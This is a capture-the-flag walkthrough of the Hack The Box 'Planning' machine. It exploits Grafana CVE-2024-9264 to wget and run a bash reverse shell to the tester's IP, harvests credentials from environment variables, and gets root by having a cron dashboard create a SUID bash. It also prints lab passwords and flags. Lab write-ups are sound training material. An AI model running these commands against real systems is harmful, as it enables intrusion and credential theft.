Planning
About this machine: HTB
Operating system: Linux
Skills used:
SUID
Crontabs
Grafana
The machine starts us off with the following premise:

As is common in real life pentests, you will start the Planning box with credentials for the following account: admin / 0D5oT70Fq13EvB5r

We run the first reconnaissance scan:
nmap -p- --open -sS -T4 -Pn -n 10.10.11.68 -oN first_scann

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-19 13:58 EDT
Nmap scan report for 10.10.11.68
Host is up (0.16s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
We run a version scan with default scripts:
nmap -p80,22 -sVC -T4 -Pn -n 10.10.11.68 -oN version_scann

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-19 14:00 EDT
Nmap scan report for 10.10.11.68
Host is up (0.15s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We browse to port 80:

(screenshot)

Nothing loads from the bare IP, since the server redirects to http://planning.htb/.
We add the domain to /etc/hosts and enumerate subdomains with ffuf, which finds the following:
./ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u 'http://10.10.11.68' -H "HOST:FUZZ.planning.htb" -fs 178

        v2.1.0-dev

 :: Method           : GET
 :: URL              : http://10.10.11.68
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.planning.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 178

grafana                 [Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 154ms]
We add the Grafana vhost to /etc/hosts:
nvim /etc/hosts
10.10.11.68 grafana.planning.htb
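Equivalently, both names can be appended in one shot from a shell (assuming sudo on the attacking machine):

echo '10.10.11.68 planning.htb grafana.planning.htb' | sudo tee -a /etc/hosts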
We take a look at what's running:

(screenshot)

We log in with the credentials provided at the start and we're in:

(screenshot)

We check the Grafana version:
whatweb http://grafana.planning.htb

http://grafana.planning.htb/login [200 OK] Country[RESERVED][ZZ], Grafana[11.0.0], HTML5, HTTPServer[Ubuntu Linux][nginx/1.24.0 (Ubuntu)], IP[10.10.11.68], Script[text/javascript], Title[Grafana], UncommonHeaders[x-content-type-options], X-Frame-Options[deny], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block], nginx[1.24.0]
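As a cross-check, Grafana's login page embeds its build info in the bootstrap JSON, so something like this should echo the version too (a sketch; the exact JSON key can vary across releases):

curl -s http://grafana.planning.htb/login | grep -o '"version":"[^"]*"'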
We find a public exploit for Grafana 11.0.0. CVE-2024-9264 is a command injection (and local file read) flaw in Grafana's SQL Expressions feature, which hands user-supplied queries to the duckdb binary:
Exploit for Command Injection in Grafana CVE-2024-9264
We create a reverse shell script:
nvim rev.sh
cat rev.sh

#!/bin/bash

# Interactive bash reverse shell back to our listener on 10.10.14.50:443
bash -i >& /dev/tcp/10.10.14.50/443 0>&1
We serve it over HTTP:
python3 -m http.server 8000

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
We run the exploit while listening with nc in another terminal:
python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c "wget http://10.10.14.50:8000/rev.sh -O /tmp/rev.sh && chmod +x /tmp/rev.sh && /tmp/rev.sh" http://grafana.planning.htb

nc -nlvp 443
And we gain access:

(screenshot)
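Optionally, the raw shell can be upgraded to a proper TTY before poking around (a standard trick, not part of the exploit itself):

script /dev/null -c bash
# then: Ctrl+Z, 'stty raw -echo; fg', and 'reset'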
The shell lands as root inside the Grafana Docker container (note the container-style hostname in the prompt). Among the environment variables we find a username and password:
root@7ce659d667d7:/var/lib/grafana# env
AWS_AUTH_SESSION_DURATION=15m
HOSTNAME=7ce659d667d7
PWD=/var/lib/grafana
AWS_AUTH_AssumeRoleEnabled=true
GF_PATHS_HOME=/usr/share/grafana
AWS_CW_LIST_METRICS_PAGE_LIMIT=500
HOME=/usr/share/grafana
AWS_AUTH_EXTERNAL_ID=
SHLVL=2
GF_PATHS_PROVISIONING=/etc/grafana/provisioning
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
GF_PATHS_DATA=/var/lib/grafana
GF_PATHS_LOGS=/var/log/grafana
PATH=/usr/local/bin:/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
AWS_AUTH_AllowedAuthProviders=default,keys,credentials
GF_PATHS_PLUGINS=/var/lib/grafana/plugins
GF_PATHS_CONFIG=/etc/grafana/grafana.ini
_=/usr/bin/env
OLDPWD=/lib
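The interesting pair is GF_SECURITY_ADMIN_USER / GF_SECURITY_ADMIN_PASSWORD. A quick filter pulls them out of the noise:

env | grep '^GF_SECURITY'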
We try to log in over SSH as enzo with the new password, successfully:
ssh enzo@10.10.11.68
enzo@10.10.11.68's password:
Now we grab the first flag:
enzo@planning:~$ ls
agent  nohup.out  user.txt
enzo@planning:~$ cat user.txt
7e7974ab5f5f06332f5f29060d29fe1e
With the first flag in hand, it's time to escalate privileges.
Hunting for a way to escalate, I found /opt/crontabs/crontab.db, a file that basically exposes the user and password for the dashboard of cron jobs running on the system:
enzo@planning:~$ cat /opt/crontabs/crontab.db
{"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily","stopped":false,"timestamp":"Fri Feb 28 2025 20:36:23 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740774983276,"saved":false,"_id":"GTI22PpoJNtRKg0W"}
{"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *","stopped":false,"timestamp":"Sat Mar 01 2025 17:15:09 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740849309992,"saved":false,"_id":"gNIRXh1WIc9K7BYX"}
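The file is newline-delimited JSON (one record per job), so if jq happens to be on the box it reads much more cleanly; note the zip password P4ssw0rdS0pRi0T3c inside the backup command:

jq -r '"\(.name): \(.command)"' /opt/crontabs/crontab.db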
We verify that the dashboard is running on port 8000:
enzo@planning:~$ netstat -tupln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:39445         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.54:53           0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
udp        0      0 127.0.0.54:53           0.0.0.0:*                           -
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -
The service only listens on localhost, so to reach it from my machine we set up SSH port forwarding:
ssh -L 8000:127.0.0.1:8000 enzo@planning.htb
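With the tunnel up, the dashboard should answer on our loopback; any HTTP status code here confirms the forward works (quick check, assuming curl):

curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:8000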
We're in:

(screenshot)
Now we just need to create a cron job that escalates privileges. In this case we have it drop a SUID copy of bash in the temporary directory (/tmp); since the dashboard's jobs run as root, executing that copy afterwards will make us root:

(screenshot)
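The job body isn't legible in the screenshot, but given the SUID bash that shows up in /tmp below, it was presumably something along these lines (a sketch of the classic SUID-bash trick):

cp /bin/bash /tmp/bash && chmod u+s /tmp/bash   # runs as root via the cron dashboard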
enzo@planning:~$ cd /tmp
enzo@planning:/tmp$ ll
total 1472
drwxrwxrwt 14 root root    4096 May 20 22:14 ./
drwxr-xr-x 22 root root    4096 Apr  3 14:40 ../
-rwsr-xr-x  1 root root 1446024 May 20 22:14 bash*
-rw-r--r--  1 root root       0 May 20 22:14 dLhGkzjYvsVNZP93.stderr
-rw-r--r--  1 root root       0 May 20 22:14 dLhGkzjYvsVNZP93.stdout
drwxrwxrwt  2 root root    4096 May 20 13:42 .font-unix/
drwxrwxrwt  2 root root    4096 May 20 13:42 .ICE-unix/
drwx------  3 root root    4096 May 20 14:00 systemd-private-8ede301cbd794ed2adf488819b51ebd6-fwupd.service-9z95Dl/
drwx------  3 root root    4096 May 20 13:42 systemd-private-8ede301cbd794ed2adf488819b51ebd6-ModemManager.service-DG5nDx/
drwx------  3 root root    4096 May 20 13:42 systemd-private-8ede301cbd794ed2adf488819b51ebd6-polkit.service-A3mFMF/
drwx------  3 root root    4096 May 20 13:42 systemd-private-8ede301cbd794ed2adf488819b51ebd6-systemd-logind.service-lxeut5/
drwx------  3 root root    4096 May 20 13:42 systemd-private-8ede301cbd794ed2adf488819b51ebd6-systemd-resolved.service-7O4Qri/
drwx------  3 root root    4096 May 20 13:42 systemd-private-8ede301cbd794ed2adf488819b51ebd6-systemd-timesyncd.service-wQI4FM/
drwx------  3 root root    4096 May 20 14:00 systemd-private-8ede301cbd794ed2adf488819b51ebd6-upower.service-elPRkR/
drwx------  2 root root    4096 May 20 13:43 vmware-root_738-2999591909/
drwxrwxrwt  2 root root    4096 May 20 13:42 .X11-unix/
drwxrwxrwt  2 root root    4096 May 20 13:42 .XIM-unix/
-rw-r--r--  1 root root       0 May 20 22:14 YvZsUUfEXayH6lLj.stderr
-rw-r--r--  1 root root       0 May 20 22:14 YvZsUUfEXayH6lLj.stdout
enzo@planning:/tmp$ ./bash -p
bash-5.2# whoami
root
Thanks to the -p flag, bash keeps its root effective UID instead of dropping privileges. We're root; now we look for the last flag:
bash-5.2# cd /root
bash-5.2# ls
root.txt  scripts
bash-5.2# cat root.txt
dc98445e7cc013383b09ca25c93051eb
With the last flag found, the machine is done.